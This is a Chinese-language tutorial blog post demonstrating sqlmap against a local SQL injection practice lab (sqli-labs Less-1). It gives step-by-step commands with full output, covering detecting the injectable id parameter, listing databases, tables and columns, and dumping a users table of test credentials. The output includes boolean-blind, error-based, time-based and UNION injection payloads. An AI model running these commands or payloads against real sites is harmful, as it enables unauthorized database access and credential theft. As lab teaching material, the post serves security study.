Sqlmap是如何GET注入的

Posted 2021-07-04 web安全工具库

人有时候会突然不快乐了

​突然被记忆力的某个细节揪住

突然陷入深深的沉默。。。

----  网易云热评     

一、监测是否存在注入

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1"

运行结果：id存在注入，可能存在的类型：报错注入、布尔盲注、时间盲注、联合注入

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=1' AND 3164=3164 AND 'mfxU'='mfxU    Type: error-based    Title: mysql >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: id=1' AND GTID_SUBSET(CONCAT(0x7170787671,(SELECT (ELT(6170=6170,1))),0x7171707671),6170) AND 'OQBr'='OQBr    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 5125 FROM (SELECT(SLEEP(5)))KhmQ) AND 'FLCn'='FLCn    Type: UNION query    Title: Generic UNION query (NULL) - 3 columns    Payload: id=-3273' UNION ALL SELECT NULL,CONCAT(0x7170787671,0x6749526d50674c70454d46764779685973766f45787156766e574b6b7244554c6d697559506b6d54,0x7171707671),NULL-- ----[12:46:50] [INFO] the back-end DBMS is MySQLweb application technology: nginx 1.15.11, php 5.4.45back-end DBMS: MySQL >= 5.6[12:46:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

二、获取数据库名称

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --dbs

运行结果：

[12:55:26] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.45, Nginx 1.15.11back-end DBMS: MySQL >= 5.6[12:55:26] [INFO] fetching database namesavailable databases [9]:[*] challenges[*] dvwa[*] information_schema[*] mysql[*] performance_schema[*] security[*] sys[*] www_dgdg_com[*] www_zm_com[12:55:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

三、获取表名

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security --tables

-D指定数据库名称

--tables获取表名

运行结果：

[12:58:52] [INFO] the back-end DBMS is MySQLweb application technology: Nginx 1.15.11, PHP 5.4.45back-end DBMS: MySQL >= 5.6[12:58:52] [INFO] fetching tables for database: 'security'Database: security[4 tables]+----------+| emails   || referers || uagents  || users    |+----------+[12:58:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'         

四、获取列名

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security -T users --columns

-T指定表名

运行结果：

[13:01:32] [INFO] the back-end DBMS is MySQLweb application technology: Nginx 1.15.11, PHP 5.4.45back-end DBMS: MySQL >= 5.6[13:01:32] [INFO] fetching columns for table 'users' in database 'security'Database: securityTable: users[3 columns]+----------+-------------+| Column   | Type        |+----------+-------------+| id       | int(3)      || password | varchar(20) || username | varchar(20) |+----------+-------------+[13:01:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

五、获取字段内容

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security -T users --dump "password,username"

运行结果：

[13:04:07] [INFO] the back-end DBMS is MySQLweb application technology: Nginx 1.15.11, PHP 5.4.45back-end DBMS: MySQL >= 5.6[13:04:07] [INFO] fetching columns for table 'users' in database 'security'[13:04:07] [INFO] fetching entries for table 'users' in database 'security'Database: securityTable: users[13 entries]+----+------------+----------+| id | password   | username |+----+------------+----------+| 1  | Dumb       | Dumb     || 2  | I-kill-you | Angelina || 3  | p@ssword   | Dummy    || 4  | crappy     | secure   || 5  | stupidity  | stupid   || 6  | genious    | superman || 7  | mob!le     | batman   || 8  | admin      | admin    || 9  | admin1     | admin1   || 10 | admin2     | admin2   || 11 | admin3     | admin3   || 12 | dumbo      | dhakkan  || 14 | admin4     | admin4   |+----+------------+----------+[13:04:07] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/security/users.csv'                                              [13:04:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

禁止非法，后果自负

欢迎关注公众号：web安全工具库

欢迎关注视频号：之乎者也吧